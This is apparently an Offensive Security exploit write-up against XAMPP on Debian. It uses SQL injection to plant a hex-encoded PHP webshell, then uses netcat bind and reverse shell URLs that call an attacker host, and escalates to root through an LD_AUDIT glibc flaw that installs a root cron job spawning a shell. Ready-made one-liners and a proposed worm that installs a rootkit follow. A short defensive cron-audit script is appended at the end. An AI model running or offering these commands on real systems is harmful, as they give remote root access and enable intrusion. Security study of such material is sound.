Debian

Debian backdoor.

---
DROP TABLE IF EXISTS `fm`;
CREATE TABLE `fm` ( `fm` longblob ) TYPE=MyISAM;
insert into fm (fm) values (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e);
select fm from fm into dumpfile '/opt/lampp/htdocs/xampp_backup.php';
drop table fm;
flush logs;
---

Now you can connect to the server and create a connection with telnet, nc, write binary with perl -e ' print "/x41/x42/x43/x44"', echo -en '/x41/x42/x43/x44', ...

If direct shell access isn't possible you can use phpcode to create your own binary with php fwrite:

---
<?php
$File = "/tmp/nc";
$Handle = fopen($File, 'w');
$Data = "/x41/x42/x43/x44";
fwrite($Handle, $Data);
fclose($Handle);
?>
---

Now use

Bind-Shell:
http://victimip/xampp_backup.php?c=nc -l -p 9999 -e /bin/bash

Reverse-Shell:
http://victimip/xampp_backup.php?c=/bin/nc attackerip 9999 | /bin/bash

in your webbrowser and connect to your shell

$ nc victimip 9999
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

---

Now let's exploit the DSO vuln.

You need umask 0 for correct rw-rw-rw creation of exploit /etc/cron.d/exploit

$ umask 0

This is the shellscript for the cron.d entry.

Bind-Shell:
$ echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh

Reverse-Shell:
$ echo -e '/bin/nc localhost 8888 | /bin/bash' > /tmp/exploit.sh

Now make your shellscript executable for cron:

$ chmod u+x /tmp/exploit.sh

Create rw-rw-rw file in cron directory using the setuid ping program:

$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping

Launch a suid root shell every minute:

$ echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit

Now you have a root shell every minute.

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

-------------------
| EXPLOIT oneline |
-------------------

echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

------------------------------
| EXPLOIT from webshell only |
------------------------------

http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh
http://victimip/xampp_backup.php?c=/bin/chmod 0744 /tmp/exploit.sh
http://victimip/xampp_backup.php?c=umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
http://victimip/xampp_backup.php?c=echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

---------------------------------
| EXPLOIT from webshell oneline |
---------------------------------

http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

---------
| IDEAS |
---------

Looks like a wormable bug. The urlobfuscated (IDS/IPS) worm searches for SQLI/BSQLI bugs or remote code execution bugs. Then the worm injects the evil url and does the same for other ips. It installs a rootkit-bot and the game is over.

© Offensive Security 2010
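For defenders, the state this write-up leaves in /etc/cron.d can be checked for directly. The script below is an added example, not part of the original post: it flags cron files writable by group or others and root jobs whose command sits under /tmp, /var/tmp or /dev/shm. The function names and the sample files are constructed for illustration.

```shell
#!/bin/sh
# audit_cron_dir DIR: print one finding per line for a cron.d-style directory.
audit_cron_dir() {
    dir=$1
    # 1. Files writable by group or others. The file created in the post is
    #    rw-rw-rw-, which lets any local user add a root job.
    find "$dir" -type f \( -perm -0002 -o -perm -0020 \) 2>/dev/null |
    while IFS= read -r f; do
        printf 'WRITABLE %s\n' "$f"
    done
    # 2. Jobs run as root whose command sits in a world-writable temp dir.
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        awk -v file="$f" '
            /^[ \t]*#/ || /^[ \t]*$/ { next }   # comments and blank lines
            $1 ~ /^@/ { user = $2; cmd = $3 }   # @reboot-style schedule
            $1 !~ /^@/ { user = $6; cmd = $7 }  # five time fields, then user
            user == "root" && cmd ~ /^\/(tmp|var\/tmp|dev\/shm)\// {
                printf "ROOT_TMP_JOB %s: %s\n", file, cmd
            }' "$f"
    done
    return 0
}

# Constructed sample: one ordinary job file and one shaped like the post's result.
make_sample() {
    d=$(mktemp -d) || return 1
    printf '17 * * * * root /usr/sbin/logrotate /etc/logrotate.conf\n' > "$d/ok"
    chmod 644 "$d/ok"
    printf '*/1 * * * * root /tmp/exploit.sh\n' > "$d/exploit"
    chmod 666 "$d/exploit"
    printf '%s\n' "$d"
}

# With an argument, audit that directory; with none, audit the constructed sample.
if [ $# -gt 0 ]; then
    audit_cron_dir "$1"
else
    sample=$(make_sample) && audit_cron_dir "$sample"
    if [ -n "$sample" ]; then rm -rf "$sample"; fi
fi
```

Run it as `sh audit_cron.sh /etc/cron.d`; any output line is worth investigating, since package-installed cron files are normally mode 644 and do not call scripts in temp directories.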
